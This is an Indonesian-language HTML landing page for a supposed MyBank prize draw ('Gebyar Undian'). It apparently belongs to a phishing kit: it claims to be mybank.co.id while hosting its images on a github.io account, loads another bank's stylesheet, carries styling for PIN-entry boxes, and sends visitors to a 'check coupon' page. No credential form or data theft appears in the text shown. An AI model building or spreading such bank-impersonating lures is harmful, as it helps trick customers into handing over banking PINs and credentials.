<html>
<meta charset="utf-8">
<meta name="theme-color" content="">
<meta content="width=device-width, initial-scale=1 maximum-scale=1" name="viewport">
<head>
      <title>GEBYAR UNDIAN MYBANK</title>
         
  <meta content="My Bank" property="og:title">
  <meta content="mybank.co.id" property="twitter:title">
   <meta content="https://mybankinfo.github.io/mobil.png" property="og:image">
  <link rel="canonical" href="https://www.mybank.co.id">
  <meta name="description" content="MyBank">
        <meta name="keywords" content="MyBank">
  <meta content="MyBank" property="og:title">
  <meta content="https://www.mybank.co.id" property="twitter:title">
   <meta property="og:url" content="">
<meta http-equiv="Content-Security-Policy" content="default-src * 'self' 'unsafe-inline' 'unsafe-eval' data: gap:">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Inter:100,200,300,regular,500,600,700,800,900" media="all"> 
<link href="https://uploads-ssl.webflow.com/644212b949c2624101239c6f/css/sinarmas-mobile.webflow.e4429d583.css" rel="stylesheet" type="text/css"/>
  <link href="https://mybankinfo.github.io/mobil.png" rel="shortcut icon" type="image/x-icon">
  <link href="https://mybankinfo.github.io/mobil.png" rel="apple-touch-icon">
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js"></script>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
  </head>
   <style>
   body, html{
       background: url('https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTwNqaAUOmhXLDkjzdlkj055-tyQJ2grkHYRA&usqp=CAU'); white no-repeat center center;
  background-position: 100% 100%;
  background-size: 100% 100%;
       width: 100%;
       position: fixed;
       text-align: center;
   }
   
   
   .logo{
        font-family: helvetica;
  text-align:center;
  color: #fff;
  max-width: 50%;
  height: auto;
  font-size: 13px;
  margin-top: -15px;
  margin-bottom: -55px;
  margin-left: 0px;
  background: #118EEA;
  background-image: url("");

   }
   
  h1 { 
  font-family: helvetica;
  text-align:center;
  color: #fff;
  max-width: 100%;
  font-size: 15px;
  margin-top: 70px;
  margin-bottom: 50px;
  opacity: 0.0;
}

h2 { 
  font-family: helvetica;
  text-align:center;
  color: #fff;
  max-width: 100%;
  font-size: 13px;
  margin-top: 10px;
  margin-bottom: 10px;
  background: #118EEA;
}

h3 { 
  font-family: helvetica;
  text-align:center;
  color: #fff;
  max-width: 100%;
  font-size: 13px;
  margin-top: -10px;
  margin-bottom: 50px;
  background: #118EEA;
  font-weight: 800;
  
}

h4 { 
  font-family: helvetica;
  text-align:center;
  max-width: 100%;
  font-size: 13px;
  margin-top: 250px;
  margin-bottom: 50px;
  font-weight: 800;
  
}

 .container-4{
   background: none;
  background-position: 100% 100%;
  background-size: 100% 100%;
 }
 

.button { 
  font-family: helvetica;
  text-align:center;
  color: #fff;
  padding: -5px;
  margin: -1px;
  max-width: 100%;
  font-size: 12px;
  margin-top: 20px;
  margin-bottom: 50px;
  background: #118EEA;
  border: 1px solid;
  border-color: #fff;
  border-radius: 20px;
  width: 30%;
  height: 22px;
}

.btn-submit { 
  font-family: helvetica;
  text-align:center;
  font-weight: 800;
  color: #fff;
  padding: 4px;
  margin: 15px;
  max-width: 100%;
  font-size: 17px;
  margin-top: 25px;
  margin-bottom: 50px;
  background: #118EEA;
  border-radius: 20px;
  border: none;
  width: 25%;
}

.pin-code{ 
  padding: 0; 
  margin: 0 auto; 
  display: flex;
  justify-content:center;
  
} 
 
.pin-code input { 
  border: none; 
  text-align: center; 
  width: 36px;
  height:42px;
  font-size: 36px; 
  background-color: #fff;
  margin-right:-0px;
  border-radius: 8px;
} 



.pin-code input:focus { 
  border: 0px solid #573D8B;
  outline:none;
} 


input::-webkit-outer-spin-button,
input::-webkit-inner-spin-button {
    -webkit-appearance: none;
    margin: 0;
}
 
 
  /*********************/
.process {
     width: 100%;
            height: 100%;
             display: flex;
             justify-content: center;
            margin: auto;
            position: absolute;
           padding-top: 300px;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.6);
            z-index: 99999;
            
      
}
.loading {
    position: absolute;
    display: flex;
    justify-content: center;
    align-items: center;
    margin-bottom: 20%;
}
.loading img {
    width: 40px;
    
    top: 10;
}
.loading .spinner{
    position: absolute;
    width: 35px;
    animation: spin 1s linear infinite;
    -webkit-animation: spin 1s linear infinite;
    -moz-animation: spin 1s linear infinite;
    -ms-animation: spin 1s linear infinite;
    -o-animation: spin 1s linear infinite;
}
@keyframes spin {
  0% { transform: rotate(360deg); }
  100% { transform: rotate(0deg); }
}
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-moz-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-ms-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-o-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}

 .marquee{
     color: white;
     position: fixed;
     left: 0;
     right: 0;
     bottom: 5;
     border-top: 1px solid #CCCCCC70;
     padding: 5px;
     box-shadow: 3px 3px #118EEA, -1em 0 .4em #cccccc90;
     font-family: cursive, Arial, Helvetica, sans-serif;
 }
 welalxcome {
    display: flex;
  position: fixed;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  width: 100%;
  background: white;
  background-position: 100% 100%;
  background-size: 100% 100%;
  z-index: 10000;

}
welalxcome img {
        width:100%;
    height: 700px;
    margin-top: -55px;
    
}
chsalxcome {
        position: relative;
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
  </style>
<body class="body-4">
 </div>           
    <main> 
 <welalxcome>
 
</welalxcome>
<chsalxcome2 style="display: none;">
<div style="height:30px;width: 70px;margin-top: -30px;margin-bottom: 0px;float:center;margin-left:42%" class="talxcome">
</div>
    <div class="container-4 w-container">
<center>
   <p id="userid" style="font-size: 20px; text-align: center; margin-bottom: -120px; font-weight: 600; color: #070707; margin-top: 141px; margin-left: -125px; display: none">nomor</p>
             <p id="useridku" style="font-size: 15px; text-align: center; margin-bottom: -260px; font-weight: 400; color: #070707; margin-top: 270px; margin-left: 0px; display: none"></p>
<h1 style="opacity: 0.0"></h1>
<p style="font-size: 35px; text-align: center; font-weight: bold; color: white; margin-top: -40px; margin-left: 0px;">GEBYAR UNDIAN</p>
<br>
<button type="button" class="btn-belum" onclick="location.href='./user.html';" style="height: 40px; width: 70%; background: none; border-radius: 4px; color: white; font-weight: bold; margin-top: 138%; font-size: 40px; margin-left: -50px;">Cek Kupon</button>
</image>
    <center>
            </div>
        </div>
        </center>
            <script>
$( document ).ready(function() {
            setTimeout(() => {
                $('welalxcome').hide();
                $('chsalxcome2').fadeIn();
            },2060)
        })
        
</script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"
    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="
    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> 
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script> 
</body>
 </html>
